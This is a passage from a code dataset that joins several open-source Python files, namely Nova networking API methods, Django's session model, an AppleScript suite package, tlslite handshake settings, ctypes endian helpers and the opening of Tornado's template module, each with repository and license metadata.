"""Adds a fixed ip to instance from specified network."""
flavor = instance.get_flavor()
args = {'instance_id': instance.uuid,
'rxtx_factor': flavor['rxtx_factor'],
'host': instance.host,
'network_id': network_id}
nw_info = self.network_rpcapi.add_fixed_ip_to_instance(
context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
@base_api.refresh_cache
def remove_fixed_ip_from_instance(self, context, instance, address):
"""Removes a fixed ip from instance from specified network."""
flavor = instance.get_flavor()
args = {'instance_id': instance.uuid,
'rxtx_factor': flavor['rxtx_factor'],
'host': instance.host,
'address': address}
nw_info = self.network_rpcapi.remove_fixed_ip_from_instance(
context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
def add_network_to_project(self, context, project_id, network_uuid=None):
"""Force adds another network to a project."""
self.network_rpcapi.add_network_to_project(context, project_id,
network_uuid)
@wrap_check_policy
def associate(self, context, network_uuid, host=base_api.SENTINEL,
project=base_api.SENTINEL):
"""Associate or disassociate host or project to network."""
network = self.get(context, network_uuid)
if host is not base_api.SENTINEL:
if host is None:
objects.Network.disassociate(context, network.id,
host=True, project=False)
else:
network.host = host
network.save()
if project is not base_api.SENTINEL:
if project is None:
objects.Network.disassociate(context, network.id,
host=False, project=True)
else:
objects.Network.associate(context, project,
network_id=network.id, force=True)
@wrap_check_policy
def get_instance_nw_info(self, context, instance, **kwargs):
"""Returns all network info related to an instance."""
result = self._get_instance_nw_info(context, instance)
# NOTE(comstud): Don't update API cell with new info_cache every
# time we pull network info for an instance. The periodic healing
# of info_cache causes too many cells messages. Healing the API
# will happen separately.
base_api.update_instance_cache_with_nw_info(self, context, instance,
result, update_cells=False)
return result
def _get_instance_nw_info(self, context, instance):
"""Returns all network info related to an instance."""
flavor = instance.get_flavor()
args = {'instance_id': instance.uuid,
'rxtx_factor': flavor['rxtx_factor'],
'host': instance.host,
'project_id': instance.project_id}
nw_info = self.network_rpcapi.get_instance_nw_info(context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
def validate_networks(self, context, requested_networks, num_instances):
"""validate the networks passed at the time of creating
the server.
Return the number of instances that can be successfully allocated
with the requested network configuration.
"""
if requested_networks:
self.network_rpcapi.validate_networks(context,
requested_networks)
# Neutron validation checks and returns how many of num_instances
# instances can be supported by the quota. For Nova network
# this is part of the subsequent quota check, so we just return
# the requested number in this case.
return num_instances
def create_pci_requests_for_sriov_ports(self, context,
pci_requests,
requested_networks):
"""Check requested networks for any SR-IOV port request.
Create a PCI request object for each SR-IOV port, and add it to the
pci_requests object that contains a list of PCI request object.
"""
# This is NOOP for Nova network since it doesn't support SR-IOV.
pass
@wrap_check_policy
def get_dns_domains(self, context):
"""Returns a list of available dns domains.
These can be used to create DNS entries for floating ips.
"""
return self.network_rpcapi.get_dns_domains(context)
@wrap_check_policy
def add_dns_entry(self, context, address, name, dns_type, domain):
"""Create specified DNS entry for address."""
args = {'address': address,
'name': name,
'dns_type': dns_type,
'domain': domain}
return self.network_rpcapi.add_dns_entry(context, **args)
@wrap_check_policy
def modify_dns_entry(self, context, name, address, domain):
"""Create specified DNS entry for address."""
args = {'address': address,
'name': name,
'domain': domain}
return self.network_rpcapi.modify_dns_entry(context, **args)
@wrap_check_policy
def delete_dns_entry(self, context, name, domain):
"""Delete the specified dns entry."""
args = {'name': name, 'domain': domain}
return self.network_rpcapi.delete_dns_entry(context, **args)
@wrap_check_policy
def delete_dns_domain(self, context, domain):
"""Delete the specified dns domain."""
return self.network_rpcapi.delete_dns_domain(context, domain=domain)
@wrap_check_policy
def get_dns_entries_by_address(self, context, address, domain):
"""Get entries for address and domain."""
args = {'address': address, 'domain': domain}
return self.network_rpcapi.get_dns_entries_by_address(context, **args)
@wrap_check_policy
def get_dns_entries_by_name(self, context, name, domain):
"""Get entries for name and domain."""
args = {'name': name, 'domain': domain}
return self.network_rpcapi.get_dns_entries_by_name(context, **args)
@wrap_check_policy
def create_private_dns_domain(self, context, domain, availability_zone):
"""Create a private DNS domain with nova availability zone."""
args = {'domain': domain, 'av_zone': availability_zone}
return self.network_rpcapi.create_private_dns_domain(context, **args)
@wrap_check_policy
def create_public_dns_domain(self, context, domain, project=None):
"""Create a public DNS domain with optional nova project."""
args = {'domain': domain, 'project': project}
return self.network_rpcapi.create_public_dns_domain(context, **args)
@wrap_check_policy
def setup_networks_on_host(self, context, instance, host=None,
teardown=False):
"""Setup or teardown the network structures on hosts related to
instance.
"""
host = host or instance.host
        # NOTE(tr3buchet): host is passed in cases where we need to set up
        # or tear down the networks on a host to/from which an instance has
        # been migrated, and instance.host is not yet, or is no longer, that
        # host.
args = {'instance_id': instance.id,
'host': host,
'teardown': teardown}
self.network_rpcapi.setup_networks_on_host(context, **args)
def _get_multi_addresses(self, context, instance):
try:
fixed_ips = objects.FixedIPList.get_by_instance_uuid(
context, instance.uuid)
except exception.FixedIpNotFoundForInstance:
return False, []
addresses = []
for fixed in fixed_ips:
for floating in fixed.floating_ips:
addresses.append(floating.address)
return fixed_ips[0].network.multi_host, addresses
@wrap_check_policy
def migrate_instance_start(self, context, instance, migration):
"""Start to migrate the network of an instance."""
flavor = instance.get_flavor()
args = dict(
instance_uuid=instance.uuid,
rxtx_factor=flavor['rxtx_factor'],
project_id=instance.project_id,
source_compute=migration['source_compute'],
dest_compute=migration['dest_compute'],
floating_addresses=None,
)
multi_host, addresses = self._get_multi_addresses(context, instance)
if multi_host:
args['floating_addresses'] = addresses
args['host'] = migration['source_compute']
self.network_rpcapi.migrate_instance_start(context, **args)
@wrap_check_policy
def migrate_instance_finish(self, context, instance, migration):
"""Finish migrating the network of an instance."""
flavor = instance.get_flavor()
args = dict(
instance_uuid=instance.uuid,
rxtx_factor=flavor['rxtx_factor'],
project_id=instance.project_id,
source_compute=migration['source_compute'],
dest_compute=migration['dest_compute'],
floating_addresses=None,
)
multi_host, addresses = self._get_multi_addresses(context, instance)
if multi_host:
args['floating_addresses'] = addresses
args['host'] = migration['dest_compute']
self.network_rpcapi.migrate_instance_finish(context, **args)
def setup_instance_network_on_host(self, context, instance, host):
"""Setup network for specified instance on host."""
self.migrate_instance_finish(context, instance,
{'source_compute': None,
'dest_compute': host})
def cleanup_instance_network_on_host(self, context, instance, host):
"""Cleanup network for specified instance on host."""
self.migrate_instance_start(context, instance,
{'source_compute': host,
'dest_compute': None})
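# --- Illustrative sketch (not part of the original module): a hedged example of
# obtaining and using this API class.  The nova.network.API() factory and the
# admin context helper are assumptions based on how nova is normally wired up,
# not something defined in this file.
#
#     from nova import context as nova_context
#     from nova import network
#
#     ctxt = nova_context.get_admin_context()
#     net_api = network.API()          # resolves to this class for nova-network
#     for net in net_api.get_all(ctxt):
#         print(net.uuid, net.label)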
|
apache-2.0
|
crakensio/django_training
|
lib/python2.7/site-packages/django/contrib/sessions/models.py
|
173
|
1997
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
class SessionManager(models.Manager):
def encode(self, session_dict):
"""
Returns the given session dictionary serialized and encoded as a string.
"""
return SessionStore().encode(session_dict)
def save(self, session_key, session_dict, expire_date):
s = self.model(session_key, self.encode(session_dict), expire_date)
if session_dict:
s.save()
else:
s.delete() # Clear sessions with no data.
return s
class Session(models.Model):
"""
Django provides full support for anonymous sessions. The session
framework lets you store and retrieve arbitrary data on a
per-site-visitor basis. It stores data on the server side and
abstracts the sending and receiving of cookies. Cookies contain a
session ID -- not the data itself.
The Django sessions framework is entirely cookie-based. It does
not fall back to putting session IDs in URLs. This is an intentional
design decision. Not only does that behavior make URLs ugly, it makes
your site vulnerable to session-ID theft via the "Referer" header.
For complete documentation on using Sessions in your code, consult
the sessions documentation that is shipped with Django (also available
on the Django Web site).
"""
session_key = models.CharField(_('session key'), max_length=40,
primary_key=True)
session_data = models.TextField(_('session data'))
expire_date = models.DateTimeField(_('expire date'), db_index=True)
objects = SessionManager()
class Meta:
db_table = 'django_session'
verbose_name = _('session')
verbose_name_plural = _('sessions')
def get_decoded(self):
return SessionStore().decode(self.session_data)
# At bottom to avoid circular import
from django.contrib.sessions.backends.db import SessionStore
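# --- Illustrative sketch (not part of the original module): a hedged example of
# round-tripping data through this model.  It assumes a configured Django
# project (settings and database) using the db session backend; the key and
# payload below are made up.
#
#     from datetime import timedelta
#     from django.utils import timezone
#
#     s = Session.objects.save("abc123", {"cart": [1, 2, 3]},
#                              timezone.now() + timedelta(days=1))
#     assert s.get_decoded() == {"cart": [1, 2, 3]}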
|
cc0-1.0
|
ArneBab/pypyjs
|
website/demo/home/rfk/repos/pypy/lib-python/2.7/plat-mac/lib-scriptpackages/StdSuites/__init__.py
|
73
|
12854
|
"""
Package generated from /Volumes/Sap/System Folder/Extensions/AppleScript
Resource aeut resid 0 Standard Event Suites for English
"""
from warnings import warnpy3k
warnpy3k("In 3.x, the StdSuites package is removed.", stacklevel=2)
import aetools
Error = aetools.Error
import Text_Suite
import AppleScript_Suite
import Standard_Suite
import Macintosh_Connectivity_Clas
import QuickDraw_Graphics_Suite
import QuickDraw_Graphics_Suppleme
import Required_Suite
import Table_Suite
import Type_Names_Suite
_code_to_module = {
'TEXT' : Text_Suite,
'ascr' : AppleScript_Suite,
'core' : Standard_Suite,
'macc' : Macintosh_Connectivity_Clas,
'qdrw' : QuickDraw_Graphics_Suite,
'qdsp' : QuickDraw_Graphics_Suppleme,
'reqd' : Required_Suite,
'tbls' : Table_Suite,
'tpnm' : Type_Names_Suite,
}
_code_to_fullname = {
'TEXT' : ('StdSuites.Text_Suite', 'Text_Suite'),
'ascr' : ('StdSuites.AppleScript_Suite', 'AppleScript_Suite'),
'core' : ('StdSuites.Standard_Suite', 'Standard_Suite'),
'macc' : ('StdSuites.Macintosh_Connectivity_Clas', 'Macintosh_Connectivity_Clas'),
'qdrw' : ('StdSuites.QuickDraw_Graphics_Suite', 'QuickDraw_Graphics_Suite'),
'qdsp' : ('StdSuites.QuickDraw_Graphics_Suppleme', 'QuickDraw_Graphics_Suppleme'),
'reqd' : ('StdSuites.Required_Suite', 'Required_Suite'),
'tbls' : ('StdSuites.Table_Suite', 'Table_Suite'),
'tpnm' : ('StdSuites.Type_Names_Suite', 'Type_Names_Suite'),
}
from Text_Suite import *
from AppleScript_Suite import *
from Standard_Suite import *
from Macintosh_Connectivity_Clas import *
from QuickDraw_Graphics_Suite import *
from QuickDraw_Graphics_Suppleme import *
from Required_Suite import *
from Table_Suite import *
from Type_Names_Suite import *
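# getbaseclasses(v) below resolves the inherited AppleEvent property/element
# dictionaries for a generated suite class: it walks v._superclassnames,
# recursively fills in each superclass, merges the superclass _propdict and
# _elemdict into v, and finally adds v's own _privpropdict/_privelemdict.
# The eval() of each superclass name relies on all suites having been
# star-imported above.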
def getbaseclasses(v):
if not getattr(v, '_propdict', None):
v._propdict = {}
v._elemdict = {}
for superclassname in getattr(v, '_superclassnames', []):
superclass = eval(superclassname)
getbaseclasses(superclass)
v._propdict.update(getattr(superclass, '_propdict', {}))
v._elemdict.update(getattr(superclass, '_elemdict', {}))
v._propdict.update(getattr(v, '_privpropdict', {}))
v._elemdict.update(getattr(v, '_privelemdict', {}))
import StdSuites
#
# Set property and element dictionaries now that all classes have been defined
#
getbaseclasses(graphic_group)
getbaseclasses(oval)
getbaseclasses(graphic_text)
getbaseclasses(graphic_shape)
getbaseclasses(drawing_area)
getbaseclasses(graphic_line)
getbaseclasses(polygon)
getbaseclasses(pixel)
getbaseclasses(rounded_rectangle)
getbaseclasses(graphic_object)
getbaseclasses(arc)
getbaseclasses(pixel_map)
getbaseclasses(rectangle)
getbaseclasses(selection_2d_object)
getbaseclasses(application)
getbaseclasses(document)
getbaseclasses(window)
getbaseclasses(file)
getbaseclasses(alias)
getbaseclasses(insertion_point)
getbaseclasses(character)
getbaseclasses(paragraph)
getbaseclasses(word)
getbaseclasses(text_flow)
getbaseclasses(text_style_info)
getbaseclasses(line)
getbaseclasses(text)
getbaseclasses(AppleTalk_address)
getbaseclasses(address_specification)
getbaseclasses(Token_Ring_address)
getbaseclasses(FireWire_address)
getbaseclasses(bus_slot)
getbaseclasses(SCSI_address)
getbaseclasses(ADB_address)
getbaseclasses(USB_address)
getbaseclasses(device_specification)
getbaseclasses(LocalTalk_address)
getbaseclasses(IP_address)
getbaseclasses(Ethernet_address)
getbaseclasses(graphic_group)
getbaseclasses(drawing_area)
getbaseclasses(cell)
getbaseclasses(column)
getbaseclasses(table)
getbaseclasses(row)
getbaseclasses(small_integer)
getbaseclasses(system_dictionary)
getbaseclasses(color_table)
getbaseclasses(fixed_point)
getbaseclasses(plain_text)
getbaseclasses(type_element_info)
getbaseclasses(machine_location)
getbaseclasses(PostScript_picture)
getbaseclasses(type_suite_info)
getbaseclasses(menu_item)
getbaseclasses(pixel_map_record)
getbaseclasses(small_real)
getbaseclasses(null)
getbaseclasses(rotation)
getbaseclasses(fixed)
getbaseclasses(long_point)
getbaseclasses(target_id)
getbaseclasses(type_property_info)
getbaseclasses(type_parameter_info)
getbaseclasses(long_fixed_point)
getbaseclasses(bounding_rectangle)
getbaseclasses(TIFF_picture)
getbaseclasses(long_fixed)
getbaseclasses(location_reference)
getbaseclasses(version)
getbaseclasses(RGB16_color)
getbaseclasses(double_integer)
getbaseclasses(type_event_info)
getbaseclasses(point)
getbaseclasses(application_dictionary)
getbaseclasses(unsigned_integer)
getbaseclasses(menu)
getbaseclasses(fixed_rectangle)
getbaseclasses(long_fixed_rectangle)
getbaseclasses(type_class_info)
getbaseclasses(RGB96_color)
getbaseclasses(dash_style)
getbaseclasses(scrap_styles)
getbaseclasses(extended_real)
getbaseclasses(long_rectangle)
getbaseclasses(May)
getbaseclasses(string)
getbaseclasses(miles)
getbaseclasses(number_or_date)
getbaseclasses(October)
getbaseclasses(event)
getbaseclasses(Pascal_string)
getbaseclasses(zone)
getbaseclasses(picture)
getbaseclasses(list_or_string)
getbaseclasses(number)
getbaseclasses(Tuesday)
getbaseclasses(version)
getbaseclasses(December)
getbaseclasses(square_kilometres)
getbaseclasses(reference)
getbaseclasses(vector)
getbaseclasses(weekday)
getbaseclasses(Sunday)
getbaseclasses(international_text)
getbaseclasses(seconds)
getbaseclasses(RGB_color)
getbaseclasses(kilometres)
getbaseclasses(styled_Unicode_text)
getbaseclasses(missing_value)
getbaseclasses(metres)
getbaseclasses(number_or_string)
getbaseclasses(list)
getbaseclasses(linked_list)
getbaseclasses(real)
getbaseclasses(encoded_string)
getbaseclasses(list_or_record)
getbaseclasses(Monday)
getbaseclasses(September)
getbaseclasses(anything)
getbaseclasses(property)
getbaseclasses(reference_form)
getbaseclasses(item)
getbaseclasses(grams)
getbaseclasses(record)
getbaseclasses(empty_ae_name_)
getbaseclasses(constant)
getbaseclasses(square_miles)
getbaseclasses(data)
getbaseclasses(Unicode_text)
getbaseclasses(yards)
getbaseclasses(cubic_yards)
getbaseclasses(pounds)
getbaseclasses(cubic_centimetres)
getbaseclasses(text)
getbaseclasses(July)
getbaseclasses(cubic_metres)
getbaseclasses(styled_text)
getbaseclasses(number_2c__date_or_text)
getbaseclasses(feet)
getbaseclasses(February)
getbaseclasses(degrees_Celsius)
getbaseclasses(keystroke)
getbaseclasses(integer)
getbaseclasses(degrees_Fahrenheit)
getbaseclasses(list_2c__record_or_text)
getbaseclasses(date)
getbaseclasses(degrees_Kelvin)
getbaseclasses(centimetres)
getbaseclasses(writing_code)
getbaseclasses(alias_or_string)
getbaseclasses(writing_code_info)
getbaseclasses(text_item)
getbaseclasses(machine)
getbaseclasses(type_class)
getbaseclasses(preposition)
getbaseclasses(Wednesday)
getbaseclasses(upper_case)
getbaseclasses(March)
getbaseclasses(square_feet)
getbaseclasses(November)
getbaseclasses(quarts)
getbaseclasses(alias)
getbaseclasses(January)
getbaseclasses(month)
getbaseclasses(June)
getbaseclasses(August)
getbaseclasses(styled_Clipboard_text)
getbaseclasses(gallons)
getbaseclasses(cubic_inches)
getbaseclasses(Friday)
getbaseclasses(sound)
getbaseclasses(class_)
getbaseclasses(kilograms)
getbaseclasses(script)
getbaseclasses(litres)
getbaseclasses(boolean)
getbaseclasses(square_metres)
getbaseclasses(inches)
getbaseclasses(character)
getbaseclasses(April)
getbaseclasses(ounces)
getbaseclasses(app)
getbaseclasses(handler)
getbaseclasses(C_string)
getbaseclasses(Thursday)
getbaseclasses(square_yards)
getbaseclasses(cubic_feet)
getbaseclasses(Saturday)
getbaseclasses(file_specification)
#
# Indices of types declared in this module
#
_classdeclarations = {
'cpic' : graphic_group,
'covl' : oval,
'cgtx' : graphic_text,
'cgsh' : graphic_shape,
'cdrw' : drawing_area,
'glin' : graphic_line,
'cpgn' : polygon,
'cpxl' : pixel,
'crrc' : rounded_rectangle,
'cgob' : graphic_object,
'carc' : arc,
'cpix' : pixel_map,
'crec' : rectangle,
'csel' : selection_2d_object,
'capp' : application,
'docu' : document,
'cwin' : window,
'file' : file,
'alis' : alias,
'cins' : insertion_point,
'cha ' : character,
'cpar' : paragraph,
'cwor' : word,
'cflo' : text_flow,
'tsty' : text_style_info,
'clin' : line,
'ctxt' : text,
'cat ' : AppleTalk_address,
'cadr' : address_specification,
'ctok' : Token_Ring_address,
'cfw ' : FireWire_address,
'cbus' : bus_slot,
'cscs' : SCSI_address,
'cadb' : ADB_address,
'cusb' : USB_address,
'cdev' : device_specification,
'clt ' : LocalTalk_address,
'cip ' : IP_address,
'cen ' : Ethernet_address,
'cpic' : graphic_group,
'cdrw' : drawing_area,
'ccel' : cell,
'ccol' : column,
'ctbl' : table,
'crow' : row,
'shor' : small_integer,
'aeut' : system_dictionary,
'clrt' : color_table,
'fpnt' : fixed_point,
'TEXT' : plain_text,
'elin' : type_element_info,
'mLoc' : machine_location,
'EPS ' : PostScript_picture,
'suin' : type_suite_info,
'cmen' : menu_item,
'tpmm' : pixel_map_record,
'sing' : small_real,
'null' : null,
'trot' : rotation,
'fixd' : fixed,
'lpnt' : long_point,
'targ' : target_id,
'pinf' : type_property_info,
'pmin' : type_parameter_info,
'lfpt' : long_fixed_point,
'qdrt' : bounding_rectangle,
'TIFF' : TIFF_picture,
'lfxd' : long_fixed,
'insl' : location_reference,
'vers' : version,
'tr16' : RGB16_color,
'comp' : double_integer,
'evin' : type_event_info,
'QDpt' : point,
'aete' : application_dictionary,
'magn' : unsigned_integer,
'cmnu' : menu,
'frct' : fixed_rectangle,
'lfrc' : long_fixed_rectangle,
'gcli' : type_class_info,
'tr96' : RGB96_color,
'tdas' : dash_style,
'styl' : scrap_styles,
'exte' : extended_real,
'lrct' : long_rectangle,
'may ' : May,
'TEXT' : string,
'mile' : miles,
'nd ' : number_or_date,
'oct ' : October,
'evnt' : event,
'pstr' : Pascal_string,
'zone' : zone,
'PICT' : picture,
'ls ' : list_or_string,
'nmbr' : number,
'tue ' : Tuesday,
'vers' : version,
'dec ' : December,
'sqkm' : square_kilometres,
'obj ' : reference,
'vect' : vector,
'wkdy' : weekday,
'sun ' : Sunday,
'itxt' : international_text,
'scnd' : seconds,
'cRGB' : RGB_color,
'kmtr' : kilometres,
'sutx' : styled_Unicode_text,
'msng' : missing_value,
'metr' : metres,
'ns ' : number_or_string,
'list' : list,
'llst' : linked_list,
'doub' : real,
'encs' : encoded_string,
'lr ' : list_or_record,
'mon ' : Monday,
'sep ' : September,
'****' : anything,
'prop' : property,
'kfrm' : reference_form,
'cobj' : item,
'gram' : grams,
'reco' : record,
'undf' : empty_ae_name_,
'enum' : constant,
'sqmi' : square_miles,
'rdat' : data,
'utxt' : Unicode_text,
'yard' : yards,
'cyrd' : cubic_yards,
'lbs ' : pounds,
'ccmt' : cubic_centimetres,
'ctxt' : text,
'jul ' : July,
'cmet' : cubic_metres,
'STXT' : styled_text,
'nds ' : number_2c__date_or_text,
'feet' : feet,
'feb ' : February,
'degc' : degrees_Celsius,
'kprs' : keystroke,
'long' : integer,
'degf' : degrees_Fahrenheit,
'lrs ' : list_2c__record_or_text,
'ldt ' : date,
'degk' : degrees_Kelvin,
'cmtr' : centimetres,
'psct' : writing_code,
'sf ' : alias_or_string,
'citl' : writing_code_info,
'citm' : text_item,
'mach' : machine,
'type' : type_class,
'prep' : preposition,
'wed ' : Wednesday,
'case' : upper_case,
'mar ' : March,
'sqft' : square_feet,
'nov ' : November,
'qrts' : quarts,
'alis' : alias,
'jan ' : January,
'mnth' : month,
'jun ' : June,
'aug ' : August,
'styl' : styled_Clipboard_text,
'galn' : gallons,
'cuin' : cubic_inches,
'fri ' : Friday,
'snd ' : sound,
'pcls' : class_,
'kgrm' : kilograms,
'scpt' : script,
'litr' : litres,
'bool' : boolean,
'sqrm' : square_metres,
'inch' : inches,
'cha ' : character,
'apr ' : April,
'ozs ' : ounces,
'capp' : app,
'hand' : handler,
'cstr' : C_string,
'thu ' : Thursday,
'sqyd' : square_yards,
'cfet' : cubic_feet,
'sat ' : Saturday,
'fss ' : file_specification,
}
class StdSuites(Text_Suite_Events,
AppleScript_Suite_Events,
Standard_Suite_Events,
Macintosh_Connectivity_Clas_Events,
QuickDraw_Graphics_Suite_Events,
QuickDraw_Graphics_Suppleme_Events,
Required_Suite_Events,
Table_Suite_Events,
Type_Names_Suite_Events,
aetools.TalkTo):
_signature = 'ascr'
_moduleName = 'StdSuites'
|
mit
|
nirmeshk/oh-mainline
|
vendor/packages/gdata/src/gdata/tlslite/HandshakeSettings.py
|
359
|
6364
|
"""Class for setting handshake parameters."""
from constants import CertificateType
from utils import cryptomath
from utils import cipherfactory
class HandshakeSettings:
"""This class encapsulates various parameters that can be used with
a TLS handshake.
@sort: minKeySize, maxKeySize, cipherNames, certificateTypes,
minVersion, maxVersion
@type minKeySize: int
@ivar minKeySize: The minimum bit length for asymmetric keys.
If the other party tries to use SRP, RSA, or Diffie-Hellman
parameters smaller than this length, an alert will be
signalled. The default is 1023.
@type maxKeySize: int
@ivar maxKeySize: The maximum bit length for asymmetric keys.
If the other party tries to use SRP, RSA, or Diffie-Hellman
parameters larger than this length, an alert will be signalled.
The default is 8193.
@type cipherNames: list
@ivar cipherNames: The allowed ciphers, in order of preference.
The allowed values in this list are 'aes256', 'aes128', '3des', and
'rc4'. If these settings are used with a client handshake, they
determine the order of the ciphersuites offered in the ClientHello
message.
If these settings are used with a server handshake, the server will
choose whichever ciphersuite matches the earliest entry in this
list.
NOTE: If '3des' is used in this list, but TLS Lite can't find an
add-on library that supports 3DES, then '3des' will be silently
removed.
The default value is ['aes256', 'aes128', '3des', 'rc4'].
@type certificateTypes: list
@ivar certificateTypes: The allowed certificate types, in order of
preference.
The allowed values in this list are 'x509' and 'cryptoID'. This
list is only used with a client handshake. The client will
advertise to the server which certificate types are supported, and
will check that the server uses one of the appropriate types.
NOTE: If 'cryptoID' is used in this list, but cryptoIDlib is not
installed, then 'cryptoID' will be silently removed.
@type minVersion: tuple
@ivar minVersion: The minimum allowed SSL/TLS version.
This variable can be set to (3,0) for SSL 3.0, (3,1) for
TLS 1.0, or (3,2) for TLS 1.1. If the other party wishes to
use a lower version, a protocol_version alert will be signalled.
The default is (3,0).
@type maxVersion: tuple
@ivar maxVersion: The maximum allowed SSL/TLS version.
This variable can be set to (3,0) for SSL 3.0, (3,1) for
TLS 1.0, or (3,2) for TLS 1.1. If the other party wishes to
use a higher version, a protocol_version alert will be signalled.
The default is (3,2). (WARNING: Some servers may (improperly)
reject clients which offer support for TLS 1.1. In this case,
try lowering maxVersion to (3,1)).
"""
def __init__(self):
self.minKeySize = 1023
self.maxKeySize = 8193
self.cipherNames = ["aes256", "aes128", "3des", "rc4"]
self.cipherImplementations = ["cryptlib", "openssl", "pycrypto",
"python"]
self.certificateTypes = ["x509", "cryptoID"]
self.minVersion = (3,0)
self.maxVersion = (3,2)
#Filters out options that are not supported
def _filter(self):
other = HandshakeSettings()
other.minKeySize = self.minKeySize
other.maxKeySize = self.maxKeySize
other.cipherNames = self.cipherNames
other.cipherImplementations = self.cipherImplementations
other.certificateTypes = self.certificateTypes
other.minVersion = self.minVersion
other.maxVersion = self.maxVersion
if not cipherfactory.tripleDESPresent:
other.cipherNames = [e for e in self.cipherNames if e != "3des"]
if len(other.cipherNames)==0:
raise ValueError("No supported ciphers")
try:
import cryptoIDlib
except ImportError:
other.certificateTypes = [e for e in self.certificateTypes \
if e != "cryptoID"]
if len(other.certificateTypes)==0:
raise ValueError("No supported certificate types")
if not cryptomath.cryptlibpyLoaded:
other.cipherImplementations = [e for e in \
self.cipherImplementations if e != "cryptlib"]
if not cryptomath.m2cryptoLoaded:
other.cipherImplementations = [e for e in \
other.cipherImplementations if e != "openssl"]
if not cryptomath.pycryptoLoaded:
other.cipherImplementations = [e for e in \
other.cipherImplementations if e != "pycrypto"]
if len(other.cipherImplementations)==0:
raise ValueError("No supported cipher implementations")
if other.minKeySize<512:
raise ValueError("minKeySize too small")
if other.minKeySize>16384:
raise ValueError("minKeySize too large")
if other.maxKeySize<512:
raise ValueError("maxKeySize too small")
if other.maxKeySize>16384:
raise ValueError("maxKeySize too large")
for s in other.cipherNames:
if s not in ("aes256", "aes128", "rc4", "3des"):
raise ValueError("Unknown cipher name: '%s'" % s)
for s in other.cipherImplementations:
if s not in ("cryptlib", "openssl", "python", "pycrypto"):
raise ValueError("Unknown cipher implementation: '%s'" % s)
for s in other.certificateTypes:
if s not in ("x509", "cryptoID"):
raise ValueError("Unknown certificate type: '%s'" % s)
if other.minVersion > other.maxVersion:
raise ValueError("Versions set incorrectly")
if not other.minVersion in ((3,0), (3,1), (3,2)):
raise ValueError("minVersion set incorrectly")
if not other.maxVersion in ((3,0), (3,1), (3,2)):
raise ValueError("maxVersion set incorrectly")
return other
def _getCertificateTypes(self):
l = []
for ct in self.certificateTypes:
if ct == "x509":
l.append(CertificateType.x509)
elif ct == "cryptoID":
l.append(CertificateType.cryptoID)
else:
raise AssertionError()
return l
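# --- Illustrative sketch (not part of the original module): typical use is to
# build a HandshakeSettings, narrow the options documented above, and hand it
# to a tlslite handshake call.  The particular cipher list and version floor
# chosen here are examples only.
if __name__ == '__main__':
    settings = HandshakeSettings()
    settings.cipherNames = ["aes256", "aes128"]   # prefer AES-only suites
    settings.minVersion = (3, 1)                  # require TLS 1.0 or newer
    print(settings._filter().cipherNames)         # options that survive filtering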
|
agpl-3.0
|
nyasara/azuremono-docker
|
IronPython-2.7.4/Lib/ctypes/_endian.py
|
51
|
2101
|
######################################################################
# This file should be kept compatible with Python 2.3, see PEP 291. #
######################################################################
import sys
from ctypes import *
_array_type = type(c_int * 3)
def _other_endian(typ):
"""Return the type with the 'other' byte order. Simple types like
c_int and so on already have __ctype_be__ and __ctype_le__
    attributes which contain the types; for more complicated types,
only arrays are supported.
"""
try:
return getattr(typ, _OTHER_ENDIAN)
except AttributeError:
if type(typ) == _array_type:
return _other_endian(typ._type_) * typ._length_
raise TypeError("This type does not support other endian: %s" % typ)
class _swapped_meta(type(Structure)):
def __setattr__(self, attrname, value):
if attrname == "_fields_":
fields = []
for desc in value:
name = desc[0]
typ = desc[1]
rest = desc[2:]
fields.append((name, _other_endian(typ)) + rest)
value = fields
super(_swapped_meta, self).__setattr__(attrname, value)
################################################################
# Note: The Structure metaclass checks for the *presence* (not the
# value!) of a _swapped_bytes_ attribute to determine the bit order in
# structures containing bit fields.
if sys.byteorder == "little":
_OTHER_ENDIAN = "__ctype_be__"
LittleEndianStructure = Structure
class BigEndianStructure(Structure):
"""Structure with big endian byte order"""
__metaclass__ = _swapped_meta
_swappedbytes_ = None
elif sys.byteorder == "big":
_OTHER_ENDIAN = "__ctype_le__"
BigEndianStructure = Structure
class LittleEndianStructure(Structure):
"""Structure with little endian byte order"""
__metaclass__ = _swapped_meta
_swappedbytes_ = None
else:
raise RuntimeError("Invalid byteorder")
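# --- Illustrative sketch (not part of the original module): a hypothetical
# big-endian record.  The field names and sizes are examples only; the point is
# that _swapped_meta rewrites _fields_ into the non-native byte order.
if __name__ == "__main__":
    class _DemoHeader(BigEndianStructure):
        _fields_ = [("magic", c_uint32), ("length", c_uint16)]
    hdr = _DemoHeader(0x01020304, 5)
    # On a little-endian machine the raw bytes start with the most
    # significant byte of each field.
    print(repr(string_at(addressof(hdr), sizeof(hdr))))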
|
mit
|
duramato/SickRage
|
tornado/template.py
|
142
|
31156
|
#!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""A simple template system that compiles templates to Python code.
Basic usage looks like::
t = template.Template("<html>{{ myvalue }}</html>")
print t.generate(myvalue="XXX")
`Loader` is a class that loads templates from a root directory and caches
the compiled templates::
loader = template.Loader("/home/btaylor")
print loader.load("test.html").generate(myvalue="XXX")
We compile all templates to raw Python. Error-reporting is currently... uh,
interesting. Syntax for the templates::
### base.html
<html>
<head>
<title>{% block title %}Default title{% end %}</title>
</head>
<body>
<ul>
{% for student in students %}
{% block student %}
<li>{{ escape(student.name) }}</li>
{% end %}
{% end %}
</ul>
</body>
</html>
### bold.html
{% extends "base.html" %}
{% block title %}A bolder title{% end %}
{% block student %}
<li><span style="bold">{{ escape(student.name) }}</span></li>
{% end %}
Unlike most other template systems, we do not put any restrictions on the
expressions you can include in your statements. ``if`` and ``for`` blocks get
translated exactly into Python, so you can do complex expressions like::
{% for student in [p for p in people if p.student and p.age > 23] %}
<li>{{ escape(student.name) }}</li>
{% end %}
Translating directly to Python means you can apply functions to expressions
easily, like the ``escape()`` function in the examples above. You can pass
functions in to your template just like any other variable
(In a `.RequestHandler`, override `.RequestHandler.get_template_namespace`)::
### Python code
